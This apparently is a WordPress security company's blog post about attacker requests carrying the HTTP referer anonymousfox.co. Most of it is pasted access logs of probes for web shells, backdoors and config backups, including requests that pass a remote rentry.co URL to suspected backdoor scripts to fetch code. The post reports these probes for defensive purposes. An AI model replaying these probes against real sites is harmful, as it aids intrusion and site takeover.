21 Jul

Why is a Hacker Announcing Themselves By Sending Requests to Websites With the HTTP Referer anonymousfox.co?

One of the ways we keep track of vulnerabilities in WordPress plugins that we should warn customers of our service about is monitoring requests sent to our own websites. This has led to us discovering many serious vulnerabilities in plugins. It also leads to us seeing a lot of odd actions. Say, hackers trying to exploit vulnerabilities that were fixed years ago, in WordPress plugins with tens of installs, and trying to exploit them in a way that will never succeed.

Seeming to fall in to that latter category, recently we have seen quite a few requests from what appears to be a hacker being sent where the HTTP referer is set to anonymousfox.co. The HTTP referer is intended to “[contain] an absolute or partial address of the page making the request“. Currently, that domain is not registered. What makes this seem so odd is that it would be very easy security products and services to block requests that have that as the HTTP referer. So why would the hacker announce themselves like that?

Looking at our websites’ logs, we first had requests using that HTTP referer in June and there has been a significant amount of request this month. Below are the 357 requests on this website yesterday:

37.0.11.107 - - [20/Jul/2021:04:25:16 -0400] "GET /style.php HTTP/1.1" 301 515 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:25:47 -0400] "GET /style.php HTTP/1.1" 301 5140 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:26:13 -0400] "GET /style.php HTTP/1.1" 404 43927 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:26:41 -0400] "GET /moduless.php HTTP/1.1" 301 521 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:26:57 -0400] "GET /moduless.php HTTP/1.1" 301 5146 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:27:50 -0400] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 603 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:28:44 -0400] "GET /admin.php HTTP/1.1" 301 515 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:29:10 -0400] "GET /admin.php HTTP/1.1" 301 5140 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:29:40 -0400] "GET /admin.php HTTP/1.1" 404 43927 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:30:09 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 527 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:30:36 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 5152 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:30:51 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 5227 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:31:35 -0400] "GET /boom.php?x HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:32:15 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 567 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:32:38 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 5192 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:33:03 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 44011 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:33:30 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:34:19 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 599 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:34:55 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 5224 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:35:26 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 44062 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:35:57 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 301 579 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:36:22 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:37:22 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44053 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:38:27 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 583 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:39:01 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:39:25 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44059 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:39:57 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 579 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:40:49 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:41:28 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44053 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:42:38 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 301 587 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:43:21 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5212 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:43:44 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44065 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:44:30 -0400] "GET /alfindex.php HTTP/1.1" 301 521 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:44:41 -0400] "GET /alfindex.php HTTP/1.1" 301 5146 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:45:22 -0400] "GET /alfindex.php HTTP/1.1" 404 43936 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:45:42 -0400] "GET /alfa.php HTTP/1.1" 301 513 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:45:56 -0400] "GET /alfa.php HTTP/1.1" 301 5138 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:46:18 -0400] "GET /alfa.php HTTP/1.1" 404 43924 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:46:45 -0400] "GET /wp-booking.php HTTP/1.1" 301 525 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:47:09 -0400] "GET /wp-booking.php HTTP/1.1" 301 5150 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:47:20 -0400] "GET /wp-booking.php HTTP/1.1" 404 43942 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:48:01 -0400] "GET /cindex.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:48:23 -0400] "GET /cindex.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:48:53 -0400] "GET /cindex.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:49:24 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 551 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:49:49 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 5176 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:50:07 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 43984 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:50:33 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 301 529 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:50:46 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 301 5154 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:50:56 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 404 43948 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:51:26 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 301 547 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:52:05 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:52:38 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:53:02 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 404 43975 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:53:38 -0400] "GET /old-index.php HTTP/1.1" 301 523 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:54:16 -0400] "GET /old-index.php HTTP/1.1" 301 5148 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:54:37 -0400] "GET /old-index.php HTTP/1.1" 404 43939 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:55:20 -0400] "GET /config.bak.php HTTP/1.1" 301 525 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:55:41 -0400] "GET /config.bak.php HTTP/1.1" 301 5150 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:57:12 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:57:39 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:58:05 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 404 43972 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:58:48 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 301 547 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:59:36 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 301 5172 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:04:59:58 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 404 43949 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:00:23 -0400] "GET /wp-includes/config.bak.php HTTP/1.1" 301 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:00:44 -0400] "GET /wp-includes/config.bak.php HTTP/1.1" 301 5174 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:01:48 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 561 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:02:10 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 5186 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:02:28 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 44002 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:03:22 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 563 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:04:00 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 5188 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:04:38 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 44005 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:05:17 -0400] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:05:35 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 43993 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:06:38 -0400] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 555 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:07:05 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:07:38 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 43993 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:08:14 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 555 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:08:30 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:08:46 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 43996 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:09:03 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 567 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:09:19 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 5192 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:09:36 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 44008 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:10:06 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 581 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:10:23 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 5206 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:11:02 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 44032 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:11:44 -0400] "GET /haders.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:12:11 -0400] "GET /haders.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:12:34 -0400] "GET /haders.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:13:00 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 617 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:13:24 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 5242 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:13:56 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 44068 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:14:29 -0400] "GET /legion.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:14:55 -0400] "GET /legion.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:15:42 -0400] "GET /legion.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:16:10 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 573 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:16:33 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 5198 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
